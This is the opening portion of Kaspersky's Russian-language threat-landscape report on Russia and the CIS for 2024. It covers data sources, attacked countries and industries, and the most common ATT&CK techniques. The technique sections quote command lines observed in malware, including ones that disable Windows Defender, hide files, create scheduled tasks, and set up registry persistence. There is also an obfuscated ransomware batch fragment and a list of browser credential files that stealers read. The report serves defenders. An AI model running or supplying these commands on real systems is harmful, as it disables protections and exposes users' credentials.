Аналитические отчеты

«Лаборатории Касперского»

Ландшафт
киберугроз
Россия и СНГ
2024
Содержание Содержание 2

Содержание

Предисловие.......................................................................................................................................................... 3

Ландшафт угроз................................................................................................................................................... 4

Авторы и благодарности............................................................................................................................... 8

Структура отчета............................................................................................................................................... 9

Перечень атакованных стран и индустрий на основе данных

из Kaspersky Security Network.................................................................................................................. 10

Перечень тактик, техник и процедур (TTPs)....................................................................................13

Статистика на основе анализа ВПО в Kaspersky Sandbox.........................................................................................................14
Статистика на основе инцидентов............................................................................................................................................................. 36
Статистика на основе анализа ВПО в KTAE..........................................................................................................................................57

Перечень сопутствующих угроз в регионе................................................................................... 70

Атаки шифровальщиков.........................................................................................................................................................................................71
Утечки пользовательских данных.................................................................................................................................................................73
Социальная инженерия......................................................................................................................................................................................... 76
Ландшафт уязвимостей.......................................................................................................................................................................................101
Статистика активности зараженных машин из РФ и СНГ на основе Honeypots...................................................110
Атаки в публичном поле на основе OSINT.............................................................................................................................................. 111

Митигации.............................................................................................................................................................114

Выводы.................................................................................................................................................................... 117

Приложение №1.................................................................................................................................................118

Ландшафт угроз для России и СНГ 2024

Предисловие Содержание 3

Предисловие
Команда Kaspersky Cyber Threat Intelligence ежегодно делится с сообществом по кибербезопасности
глобальными исследованиями, связанными с продвинутыми постоянными угрозами (APT) и угрозами
Ransomware атак. В 2022 и 2023 годах наша команда выпустила два глобальных исследования:

Аналитические отчеты Аналитические отчеты

BlackCat «Лаборатории Касперского»
«Лаборатории Касперского»

Pysa Clop (TA505)

LockBit 2.0

Ragnar Locker Conti / Ryuk

BlackByte Hive

Азиатские
APT-
Омерзительная
восьмерка группировки
Тактики, техники и процедуры современных Тактики, техники и процедуры
группировок вымогателей

Омерзительная восьмерка Азиатские APT группировки

Тактики, техники и процедуры современных группировок Тактики, техники и процедуры.
вымогателей.

В наших отчетах уделено особое внимание анализу угроз, релевантных для различных стран по всему
миру. Наша первоочередная цель заключалась в извлечении обширного объема разведданных,
связанных с тактиками, техниками и процедурами атак, актуальными на глобальном уровне.
В результате широкого охвата исследований, наши отчеты становились объемными, описывая
общемировой вектор угрозы, без углубленного уточнения конкретных векторов атак для отдельных
регионов.

В наступившем году мы решили модифицировать наш подход и представить сообществу серию более
целевых отчетов о киберугрозах, ориентированных на конкретные регионы. Первым в этой серии
будет отчет, посвященный анализу ландшафта угроз для России и стран СНГ и здесь невозможно
обойти понятие «Ландшафт угроз» или «Threat Landscape», которое играет ключевую роль динамики
и характеристик киберугроз, присущих конкретной географической области.

Ландшафт угроз для России и СНГ 2024

Ландшафт угроз Содержание 4

Ландшафт угроз
На сегодняшний день существует довольно большое количество определений «Threat Landscape»
которые можно найти в интернете. Вот определение, которое сгенерировал нам ChatGPT:

« В угрозах пейзажа теней, виртуальные ветра несут зловещие эха. Хакерские звезды сверкают
на небесах кода, а вирусы, как темные реки, плывут в поисках цифровых берегов. Здесь,
в пустоте битов и байтов, разыгрывается театр кибербезопасности.

Мы же постараемся дать более академическое определение с нашей точки зрения:

Threat Landscape — это готовый результат всестороннего анализа

киберугроз, опирающийся на разведывательные данные, связанные
с потенциальными противниками и их характеристиками.
Этот анализ показывает наиболее релевантные угрозы для
определенной отрасли, страны или конкретной организации.

Одним из наиболее значимых источников обработанных разведданных для организаций

представляют отчеты по киберугрозам. Ежегодно по всему миру публикуются тысячи таких отчетов,
описывающих обнаруженные атаки и раскрывающих тактики, техники и процедуры, используемые
злоумышленниками. Следует отметить, что на сегодняшний день Enterprise матрица MITRE ATT&CK
включает в себя 201 технику, 424 подтехники и тысячи различных процедур. Важно учитывать, что
отчеты не являются единственным источником разведданных, о чем мы более подробно расскажем
далее.

В силу огромного объема данных, охватить все угрозы для среднестатистической организации
довольно проблематично. Лучшей стратегией является построение ландшафта угроз для собственной
компании. Аналитикам СTI необходимо фокусироваться в первую очередь на релевантных стране/
индустрии разведанных и на периодической основе корректировать ландшафт угроз в соответствии
с выявленными TTPs.

Многие читатели могут задаться вопросом: «А с чего начать построение ландшафта угроз для своей
организации?» Необходимо задать ряд первичных вопросов о своей организации:

• Кто мы такие и чем занимаемся?

• В какой индустрии развивается бизнес?
• В какой стране/регионе присутствует наш бизнес и инфраструктура?
• Какие группировки атакуют эту индустрию и регион?
• Какие техники используют выявленные группировки?
• Какое ВПО они используют?

Ландшафт угроз для России и СНГ 2024

Ландшафт угроз Содержание 5

Фактически, ответы на эти вопросы помогают сформировать ландшафт угроз. Этот шаг позволяет
понять, какие угрозы релевантны для вас. Возможно, после ответов на эти вопросы обнаружатся
группировки, атакующие банковскую сферу в России и СНГ, и это то, что вы искали для себя. Далее,
нужно понять вашего противника, и задать схожий список вопросов:

• Какие TTPs использует противник в атаках?

• Какое программное обеспечение есть на вооружении у атакующих?
• Какая инфраструктура используется атакующими?
• Какую цель преследуют злоумышленники?
• Какие контекстные разведданные существуют о группировке, которая релевантна для нас?

После завершения анализа вышеупомянутых вопросов вы будете способны сформулировать

первичную идентификацию как вашего собственного положения, так и противника. Затем вы можете
приступать к процессу маппинга тактик, техник и процедур (TTPs) на матрицу MITRE ATT&CK, используя
популярный инструмент MITRE ATT&CK Navigator. Этот инструмент поможет вам создать актуальную
матрицу угроз, адаптированную под вашу организацию.

Но как мы и сказали выше, Cyber Threat Intelligence отчеты, доступные в открытом доступе, являются
далеко не единственным источником данных о киберугрозах, которые вы можете использовать. Вот,
например, список источников этих данных, которые используем мы в Kaspersky, при написании наших
исследований, в том числе и этого:

1 Kaspersky Security Network (KSN)

Это сложная облачная инфраструктура, которая собирает и анализирует анонимные данные
о киберугрозах от сотен миллионов добровольных участников по всему миру, чтобы обеспечить
самую быструю реакцию на новые угрозы за счет использования анализа больших данных,
машинного обучения и человеческого опыта.

2 Incident Response
Мы собираем и анализируем данные с реальных инцидентов, расследуемых нашими коллегами
из Международной группы экстренного реагирования (GERT), Kaspersky Security Operations
Center (SOC) и Kaspersky ICS CERT.

3 Web crawlers
Мы получаем множество новых образцов вредоносных программ с помощью веб-краулеров
с сотнями тысяч источников. Они поступают как из OSINT, так и из наших собственных
исследований, а также из наших систем автоматической обработки и анализа, которые
извлекают вредоносные URL из вредоносного ПО.

4 BotFarm
Система, осуществляющая общение с серверами контроля и управления (С2) различных
ботнетов, имитируя поведение зараженных машин. Система используется для получения
различной TI-информации, такой как: обновлений файлов-ботов новых URL-адресов
и вредоносных файлов команд на DDoS удаленных целей шаблонов для спам-писем или
непосредственно спам-траффика текстов SMS-сообщений.

Ландшафт угроз для России и СНГ 2024

Ландшафт угроз Содержание 6

5 Spam traps
Каждый год наши антифишинговые системы предотвращают около 710 миллионов переходов
по фишинговым ссылкам, а также около 130 миллионов вредоносных почтовых вложений,
из которых мы извлекаем дополнительные данные о киберугрозах.

6 Sensors
В эту категорию входят honeypots, sinkholes и другие методы перехвата ITW-атак. Например,
у нас есть honeypots, представляющие собой IoT-устройства, уязвимые системы и программное
обеспечение и т. д. Мы изучаем попытки атак и извлекаем индикаторы компрометации, действия
злоумышленников на этих системах (TTPs), а затем связываем их с другими источниками
данных.

7 Partners
Мы участвуем в партнерстве по обмену вредоносными образцами с другими поставщиками
и организациями, занимающимися вопросами кибербезопасности.

8 OSINT
Ну и, конечно, OSINT. Собирается из общедоступных источников, включая новости, социальные
сети, различные отчеты и так далее.

Каждый полученный поток разведданных проходит многоступенчатый отбор в системе

автоматических обработок, где для отсечения ложных срабатываний и ненужных данных применяются
технологии проверки доверия и репутации и модели машинного обучения, тренируемые на выборках
из сотен миллионов актуальных доверенных и вредоносных файлов. Также каждый индикатор проходит
анализ во множестве песочниц, из которых извлекаются десятки дополнительных атрибутов, таких как
TTPs, сетевое поведение, поведение в операционной системе, и множество других связей.

Обработка указанных потоков представляет собой значительный исследовательский ресурс, который

эффективно используется нами для анализа и создания наших исследований по киберугрозам.
В настоящем докладе мы предоставляем обработанные данные о киберугрозах, которые могут
быть применены в исследованиях, касающихся угроз, имеющих отношение к России и странам СНГ,
и предлагаем вам использовать их в своей деятельности в уже готовом формате.

Но следует всегда помнить, что при разборе наших статистических данных важно учитывать
ограничения исследования. В частности, необходимо отметить, что хотя мы проанализировали сотни
различных инцидентов и миллионы образцов вредоносного программного обеспечения, связанных
с исследуемым регионом, объем анализируемой выборки может не полностью покрывать общее
количество угроз и статистику по данному региону.

Ландшафт угроз для России и СНГ 2024

Наша цель и целевая аудитория Содержание 7

Наша цель и целевая аудитория

В первую очередь данный отчет создан для всех специалистов по кибербезопасности, работающих
в организациях России и стран СНГ. События февраля 2022 года сильно изменили ландшафт угроз
в описываемом регионе. Впервые в мировой истории, за довольно короткий промежуток времени,
произошел самый крупный всплеск появления сотен хактивистких группировок, деятельность которых
сильно встряхнула ландшафт угроз довольно в короткий промежуток времени. Но и старые угрозы
никуда не исчезли, APT группировки и группировки шифровальщиков по прежнему присутствуют
в повседневной жизни специалиста по кибербезопасности описываемого региона.

Мы разработали данный отчет с целью предоставить сообществу наиболее основательно

подготовленные данные о киберугрозах, способствующие эффективному противодействию
киберугрозам в России и странах СНГ. Данный документ представляет особую ценность для:

Аналитиков SOC Аналитиков Cyber Threat Intelligence

Специалистов по цифровой криминалистике (DFIR)

Специалистов по Threat Hunting Экспертов по кибербезопасности

C-Level руководителей, ответственных за решения ИБ в организации

Администраторов доменов

Этот отчет является ценным источником информации, представляющим собой ландшафт угроз,
присущий данному региону. Он основан на анализе стратегий, применяемых противниками при
вторжении в различные инфраструктуры. В отчете содержится обширная информация о тактиках,
техниках и процедурах (TTPs) злоумышленников, описанных в рамках методологии MITRE ATT&CK.
Этот материал служит руководством для разработки подходов по предотвращению и реагированию
на киберугрозы в указанном регионе.

Ландшафт угроз для России и СНГ 2024

Авторы и благодарности Содержание 8

Авторы и благодарности
Отчет подготовлен командой Kaspersky Cyber Threat Intelligence, которая полагается на передовые
инструменты, практики и подходы: MITRE ATT&CK, F3EAD, Pyramid of Pain by David Bianco, Intelligence
Driven Incident Response, Unified Cyber Kill Chain — как для исследований TTPs злоумышленников и их
поведения в сети, так и для объединения многих подразделений вокруг процессов CTI.

Состав авторов: Никита Назаров Кирилл Митрофанов

Head of Threat Exploration Cyber Threat Intelligence Team Lead

Наталья Шорникова Александр Кириченко

Lead Cyber Threat Intelligence Analyst Senior Cyber Threat Intelligence Analyst

Владислав Бурцев Сергей Киреев

Senior Cyber Threat Intelligence Analyst Cyber Threat Intelligence Analyst

Мы также выражаем особую Команда Международная

благодарность командам за
предоставленные данные для Threat Research группа экстренного
создания отчета: реагирования (GERT3)
Kaspersky Security
Operations Center (SOC1) Команды глобального
центра исследования
Kaspersky Digital и анализа угроз
Footprint Intelligence (GReAT4)
(DFI2)

1 SOC 2 DFI 3 GERT 4 GReAT

Ландшафт угроз для России и СНГ 2024

Структура отчета Содержание 9

Структура отчета
Данный отчет состоит из 5 основных разделов, в которых каждый читатель в зависимости от своих
потребностей сможет найти то, что ему необходимо.

1 Перечень атакованных стран и индустрий на основе данных

из KSN
Данный раздел содержит основную статистику атакованных стран и индустрий на основе KSN.

2 Популярные тактики техники и процедуры (TTPs)

Этот раздел является основной технической составляющей отчета, включающей три вида
статистики по TTPs с более глубоким анализом ТОП 21 техник и анализом их процедур. Кроме
того, здесь представлен разбор типичного инцидента на основе Unified Kill Chain, характерного
для данного региона, а также анализ вредоносного программного обеспечения на основе
статистики, полученной из Kaspersky Threat Attribution Engine.

3 Перечень потенциальных угроз в регионе

Основываясь на разных наших источниках, мы составили статистику и анализ угроз
по следующим направлениям:

Шифровальщики Утечки пользовательских Социальная инженерия

данных

Ландшафт уязвимостей Статистика активности Атаки в публичном поле

зараженных машин на основе OSINT
на основе Honeypots

4 Митигации
Раздел с описанием митигаций рисков, основанный на описанных угрозах.

5 Выводы и приложение
Приложение с другими исследованиями наших команд которые более подробнее
рассматривают угрозы упомянутые в этом отчёте.

Ландшафт угроз для России и СНГ 2024

Перечень атакованных стран и индустрий на основе данных из Kaspersky Security Network Содержание 10

Перечень атакованных стран и индустрий на основе

данных из Kaspersky Security Network

Статистика атакованных стран

На основании наших источников данных, мы отмечаем следующее распределение стран, подвергшихся
угрозам за 2024 год. В процессе анализа мы использовали следующий подход: количество
пользователей, столкнувшихся с угрозами, было разделено на общее число пользователей наших
решений в исследуемом регионе, что показывает относительный процент атак в конкретной стране.
По итогу следования данной методологии мы получили следующую картину.

График 1 Процент зафиксированных атак

Атаки Таджикистан 60,69%

Беларусь 59,79%

Туркменистан 59,55%

Узбекистан 58,74%

Кыргызтан 57,21%

Казахстан 54,62%

Россия 51,86%

Азербайджан 49,37%

Армения 44,21%

Ландшафт угроз для России и СНГ 2024

Перечень атакованных стран и индустрий на основе данных из Kaspersky Security Network Содержание 11

Сделав срез по нашим данным в рамках исследуемого региона, получили следующие тренды
в отношении пользователей, столкнувшихся с угрозами в период с первого квартала 2023 года
по первый квартал 2024. Видим, что к концу года активность злоумышленников возрастает
в большинстве стран, а затем резко снижается.

График 2 Тренды по зафиксированным атакам

Таджикистан 65
Беларусь
Узбекистан
Туркменистан
Кыргызтан
60
Казахстан
Россия
Азербайджан
Армения

55

50

45

40
CY 2023 Q1 CY 2023 Q2 CY 2023 Q3 CY 2023 Q4 CY 2024 Q1

Ландшафт угроз для России и СНГ 2024

Перечень атакованных стран и индустрий на основе данных из Kaspersky Security Network Содержание 12

Статистика атакованных индустрий

Для специалистов по кибербезопасности знание об атаках на индустрию, в которой работает
их компания, имеет решающее значение по ряду причин. Это безусловно влияет на понимание самих
угроз и векторов атак, что позволяет проактивно защититься и осознать критичность защищаемых
активов. Фокусировка на защите от наиболее актуальных для вашей индустрии угроз также позволяет
оптимизировать ресурсы и усилия коллег по цеху. А ещё это знание, конечно же, демонстрирует
зрелость компании в вопросах кибербезопасности и может стать конкурентным преимуществом
на рынке.

На основе наших данных мы составили диаграмму с распределением по индустриям, которые

чаще остальных секторов экономики сталкивались с угрозами за 2024 год. Если отрасль, которую
вы защищаете, не вошла в топ-5 это не значит, что можно расслабиться. Со злоумышленниками
сталкиваются все, но с разной периодичностью.

График 3 Статистика по индустриями

Финансы 2% 1%
Строительство

Производство

Транспорт
3%
Образование
4% 2% 1% 1%
Правительство

Розничная
торговля
4%
Технология 28%
Здравоохранение

Энергетика

Телекоммуникации
7%
Гостиничный
бизнес

Развлечения

9%

24%
14%

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) Содержание 13

Перечень тактик, техник и процедур (TTPs)

Как упоминалось ранее, в Kaspersky мы пользуемся обширным набором источников, способных
предоставить большой объем разведданных, связанных с тактиками, техниками и процедурами (TTPs).

Погружаясь в изучение тактик, техник и процедур противника в РФ и СНГ из различных источников, мы

пришли к неоднородности данных. Информация, полученная из инцидентов, нарисовала свою картину,
данные о поведении вредоносных программ представили другую перспективу, а анализ вредоносного
ПО в Kaspersky Threat Attribution Engine представил третье видение. Все три картинки оказались
непохожими друг на друга. Именно по этой причине мы приняли решение разделить данный раздел
на три части.

Статистика на основе анализа ВПО в Kaspersky Sandbox

Основана на анализе миллионов самых популярных файлов вредоносного программного обеспечения
которое встречалось за первые полтора квартала 2024 года в РФ и СНГ. Данные TTPs были извлечены
с помощью Kaspersky Sandbox и добавлены в этот отчёт.

Статистика на основе инцидентов

Основана на анализе десятков различных инцидентов в РФ и СНГ, расследованных нашими коллегами
из GERT. Также в данном разделе мы поделимся интересными инцидентами характерными для
хактивистких группировок в РФ.

Статистика на основе анализа ВПО в Kaspersky TAE

Основана на тщательном анализе сотен тысяч файлов за первые полтора квартала 2024 года
в РФ и СНГ, прошедших через Kaspersky Threat Attribution Engine и получивших высокий процент
принадлежности к какой-то сущности. Эти файлы были классифицированы и атрибутированы
различным акторам или семействам вредоносного программного обеспечения, что предоставляет
ценные данные в динамику киберугроз и их участников.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 14

Статистика на основе анализа ВПО в Kaspersky Sandbox

Проанализировав миллионы наиболее распространенных вредоносных файлов за описанный период
в исследуемом регионе, мы смогли извлечь 218 различных техник и подтехник с тысячами уникальных
процедур. Это впечатляющее разнообразие. Однако, если бы мы попытались включить все эти данные
в отчет, его объем составил бы несколько тысяч страниц. Поэтому мы приняли решение выбрать 21
наиболее популярную подтехнику в описанном регионе и провести более глубокий анализ именно
по ним.

График 4 ТОП-21 TTPs

Популярность
TTPs Hide Artifacts: Hidden Files and Directories (T1564.001) 21,95%

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) 17,82%

Impair Defenses: Disable or Modify Tools (T1562.001) 11,96%

Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002) 6,16%

Scheduled Task/Job: Scheduled Task (T1053.005) 5,93%

User Execution: Malicious File (T1204.002) 4,54%

Access Token Manipulation (T1134) 4,32%

Credentials from Password Stores: Credentials from Web Browsers (T1555.003) 3,66%

Command and Scripting Interpreter: Windows Command Shell (T1059.003) 3,61%

Command and Scripting Interpreter: PowerShell (T1059.001) 3,43%

Service Stop (T1489) 2,56%

Peripheral Device Discovery (T1120) 2,48%

Masquerading: Match Legitimate Name or Location (T1036.005) 1,94%

Windows Management Instrumentation (T1047) 1,82%

Process Injection: Portable Executable Injection (T1055.002) 1,80%

Permission Groups Discovery: Local Groups (T1069.001) 1,40%

Impair Defenses: Disable or Modify System Firewall (T1562.004) 1,27%

Event Triggered Execution: Image File Execution Options Injection (T1546.012) 1,25%

Create or Modify System Process: Windows Service (T1543.003) 1,04%

Process Injection: Process Hollowing (T1055.012) 0,70%

Process Injection: Dynamic-link Library Injection (T1055.001) 0,35%

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 15

Hide Artifacts: Hidden Files and Directories T1564.001

Зачем атакующие используют скрытые файлы и директории?

Атакующие добавляют атрибут FILE_ATTRIBUTE_HIDDEN к файлу или директории, что приводит к тому,
что ее «перестает быть видно» при обычном поиске.

Как атакующие используют скрытые файлы и директории?

Наиболее частый способ добавления такого атрибута — WinAPI SetFileAttributes. Еще один часто
встречающийся вариант реализации этой техники — утилита [Link].

Самым распространенным расположением файлов и директорий, которым добавляется атрибут

HIDDEN — C:\Users\<user>\AppData\Local\Temp. Зачастую скрываемые директории называются
случайным образом, например — C:\Users\<user>\AppData\Local\Temp\orwhgn\. Другой частый
паттерн — задание HIDDEN атрибута файлу, мимикрирующему под легитимный софт, например: C:\
Windows\System32\drivers\svchî[Link].

В случае, если для задания атрибута используется утилита attrib, то самым частым паттерном будет
добавление помимо HIDDEN еще и атрибута SYSTEM (FILE_ATTRIBUTE_SYSTEM):

CommandLine5: attrib "$selfpath" +s +h.

5 $selfpath — путь к файлу, который выполняет команду.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 16

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

T1547.001

Зачем атакующие используют ключи Run реестра?

Ключи Run реестра позволяют атакующим закрепиться в системе. ОС Windows загружает при запуске
системы или логоне пользователя те исполняемые файлы, которые прописаны в значениях ключей Run
реестра.

Как атакующие используют ключи Run реестра?

В реестре Windows существует множество веток, позволяющих атакующим закрепиться в системе,
однако самыми распространенными являются:

• HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
• HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run
• HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce
• HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce
• HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
• HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows­­­­­­­­ NT\\CurrentVersion\\Winlogon\\Shell
• HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 17

User Execution: Malicious File T1204.002

Зачем атакующие используют технику User Execution?

Атакующие нередко рассчитывают, что пользователь сам выполнит вредоносных файл, который они
к нему доставили. Часто в качестве вредоносного файла используется дроппер, задача которого
загрузить следующий стейдж и запустить его.

Как атакующие используют технику User Execution?

Чтобы пользователь с большей вероятностью запустил вредоносный файл, атакующие прибегают
к методам социальной инженерии, в том числе и маскируют вредоносный файл под безобидный
документ или стандартное легитимное ПО, а также помещают себя в temp:

• C:\Users\<user>\AppData\Local\[Link]
• C:\Program Files\[Link]
• C:\Windows\rss\[Link]

Также дропперы часто используются для загрузки скриптов и их дальнейшего запуска. Популярные
командные строки загруженных файлов:

• C:\Windows\System32\_Setup.bat
• attrib +h $selfpath\[Link]
• C:\Users\<user>\AppData\Local\[Link]
• schtasks /create /f /RU

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 18

Access Token Manipulation T1134

Зачем атакующие используют Access Token Manipulation?

Атакующие используют эту технику для повышения привилегий в системе и дальнейшего развития
атаки. Одной из наиболее часто встречающихся процедур является включение (перевод в статус
Enabled) привилегий в токене (маркере доступа).

Как атакующие используют Access Token Manipulation?

Самым распространенным способом перевести привилегию в статус Enabled является использование
WinAPI AdjustTokenPrivileges. С помощью этой функции нельзя добавить привилегии, которых
нет в токене, однако можно перевести имеющиеся из статуса disabled в статус enabled. Наиболее
распространенные привилегии, которые атакующие включают — «God» privileges. Это список из 9
(официально 8) привилегий, наличие которых в токене может привести к компрометации системы:

• SeDebugPrivilege
• SeImpersonatePrivilege
• SeLoadDriverPrivilege
• SeTakeOwnershipPrivilege
• SeBackupPrivilege
• SeRestorePrivilege
• SeTcbPrivilege
• SeRelabelPrivilege6
• SeAssignPrimaryTokenPrivilege

6 Официально не считается «God» привилегией.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 19

Scheduled Task/Job: Scheduled Task T1053.005

Зачем атакующие используют планировщик задач Windows?

Планировщик задач часто используется для закрепления в системе и более незаметного выполнения
кода. Создание задачи планировщика позволяет разорвать Parent-Child связь при выполнении
вредоноса и, быть может, отложить его запуск на какое-то время.

Как атакующие используют планировщик задач Windows?

Самым распространенным способом создания и управления задачами планировщика является
утилита [Link]. Эта консольная утилита используется для задачи параметром и старта
отложенной задачи или изменения уже существующей. Стоит отметить использование нескольких
пробелов перед флагами, а также непостоянный порядок этих флагов в командной строке. Самые
частые аргументы, с которыми запускается schtasks:

• [Link] /create /tn

• schtasks /create /tn
• SchTaSKs /create /f /sc minute /mo -1 /tn
• schtasks /create /sc minute /mo 1 /tn
• C:\Windows\system32\[Link] /create /f /ru
• schtasks /create /f /RU
• [Link] /Create /F /TN
• schtasks /create /f /sc onlogon /rl highest /tn
• [Link] /create /tn Header /XML $user\\$appdata\\Chrome\\[Link]
• [Link] /Create /XML
• [Link] /create /f /tn
• schtasks /create /sc minute /mo 1 /tn Server /tr $user\\$temp/[Link]
• schtasks /create /f /sc onlogon /rl highest /tn
• C:\Windows\system32\[Link] /delete /f /tn
• schtasks /Change /TN
• SchTaSKs /create /f /sc minute /mo 5 /tn

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 20

Abuse Elevation Control Mechanism: Bypass User Account Control T1548.002

Зачем атакующие обходят UAC?

User Account Control (UAC) — технология, ограничивающая неявное использование привилегий
Администратора. Эта технология при выполнении программы требует явного подтверждения
пользователя, если программа пытается выполнить действия, для которых необходимы привилегии
администратора. Также в токен с Mandatory label — Medium становится невозможно добавить «God»
привилегии.

Как атакующие обходят UAC?

Для обхода UAC атакующие чаще всего используют известные методы, описанные, например,
в UACME7. Также популярный способ обойти технологию UAC — отключить ее с помощью установки
определенных значений в реестре. Наиболее популярно изменение следующих значений:

• EnableLUA
• ConsentPromptBehaviorAdmin
• PromptOnSecureDesktop

7 UACME

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 21

Peripheral Device Discovery T1120

Зачем атакующие изучают периферийные устройства?

Разведка периферийных устройств может производиться с различными целями: распространиться
на другие хосты, заразив USB, собрать информацию о подключенных носителях с целью зашифровать
файлы на них или собрать информацию для планирования дальнейшего развития атаки.

Как атакующие изучают периферийные устройства?

Наиболее популярный способ разведки периферийных устройств одновременно является и наиболее
простым — PowerShell. Атакующие используют такие командлеты как Get-PnpDevice или обращаются
к классам WMI: CIM_LogicalDevice, Win32_PnPdevice, Win32_PnPEntity.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 22

Impair Defenses: Disable or Modify Tools T1562.001

Зачем атакующие отключают службы и/или останавливают работу

утилит?
Атакующие отключают те службы, которые мешают им достигать целей. Это могут быть службы
мониторинга, UAC, Windows Defender и другие.

Как атакующие отключают службы и/или останавливают работу

утилит?
Наибольшей популярностью пользуются два способа: отключить те или иные параметры в реестре,
использовать определенные командлеты powershell или напрямую завершить процесс с помощью
[Link]. Примеры командных строк, где применяются все эти способы:

• [Link] /c taskkill /FI

• $windir\\$system32\\WindowsPowerShell\\v1.0\\[Link] Add-MpPreference -ExclusionPath @
($env:UserProfile, $env:ProgramData) -ExclusionExtension
• powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true
-DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled
-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent
NeverSend
• [Link] stop ClickToRunSvc

Также часто атакующие выставляют значения в реестре напрямую (при помощи WinAPI для работы
с реестром), например, устанавливают значение 1 в параметр DisableBehaviorMonitoring в ключе
«HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection».

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 23

Windows Management Instrumentation T1047

Зачем атакующие используют WMI?

С помощью технологии Windows Management Instrumentation (WMI) атакующие производят разведку,
закрепление и локальный или удаленный запуск ПО.

Как атакующие используют WMI?

Наиболее популярных способов взаимодействия с WMI два — wmic и powershell.

Пример популярных командных строк:

• wmic /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /

Format:List
• wmic process call create
• powershell Get-WmiObject -Namespace root\\SecurityCenter2 -Class AntiVirusProduct;

Самым популярным способом использования WMI в СНГ регионе в первом квартале 2024 года
оказался удаленное создание задач планировщика: на хостах, на которых создаются задачи,
от процесса [Link] рождается процесс [Link].

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 24

Credentials from Password Stores: Credentials from Web Browsers T1555.003

Зачем атакующие достают учетные данные из браузеров?

Учетные данные, хранящиеся в браузерах, могут быть интересны как сами по себе, так и в связи
с дальнейшим развитием атаки. Сами по себе данные обычно собираются стиллерами и затем
продаются или выкладываются в открытый доступ. Также секреты пользователей могут содержать
данные для аутентификации на внутренних ресурсах организации или раскрывать информацию о их
местонахождении.

Как атакующие достают учетные данные из браузеров?

Наиболее популярный способ получения доступа к секретам — напрямую взять их из файла, где они
хранятся. Вот список наиболее «просматриваемых» атакующими файлов:

• $user\$appdata\Google\Chrome\User Data\Default\Login Data

• $user\$appdata\Mozilla\Firefox\Profiles\*.default\[Link]
• $user\$appdata\Google\Chrome\User Data\Local State
• $user\$appdata\Mozilla\Firefox\Profiles\*.default\[Link]
• $user\$appdata\Google\Chrome\User Data\Default\Web Data
• $user\$appdata\Mozilla\Firefox\Profiles\*.default\[Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 25

Command and Scripting Interpreter: Windows Command Shell T1059.003

Зачем атакующие используют cmd?

Командный интерпретатор [Link] используется для быстрого выполнения команд на
скомпрометированном хосте. Использование скриптов значительно сокращает атакующим время,
необходимое для подготовки инструментария атаки.

Как атакующие используют cmd?

[Link] обычно используется для запуска консольных утилит. Наиболее частый сценарий: атакующие
загружают bat-скрипт, внутри которого уже есть команды для осуществления тех или иных действий.
Частые паттерны в командных строках утилит, запущенных из [Link] на примере интересного
скрипта:

• reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t

REG_DWORD /d 1 /fc [Link] /c E: & attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы
Зашифрованы! Пиши @Hwid_X 1>[Link] & attrib -h +s +r [Link] POwERsHElL -noNiNTEraCTI
-NolO -wiN hIdden -execuTIONpOLIc byPASS -nOPrOFIle -COmMANd &( $eNV:ComsPec[4,24,25]-JoIn…

Топ утилит, которые вызываются в bat-скриптах:

• $windir\\$system32\\[Link]
• $windir\\$system32\\[Link]
• $windir\\$system32\\[Link]
• $windir\\$system32\\[Link]
• $windir\\$system32\\[Link]
• $windir\\$system32\\[Link]
• $windir\\$system32\\[Link]
• $windir\\$system32\\[Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 26

Command and Scripting Interpreter: PowerShell T1059.001

Зачем атакующие используют PowerShell?

PowerShell — мощный инструмент, с помощью которого атакующие выполняют различные действия:
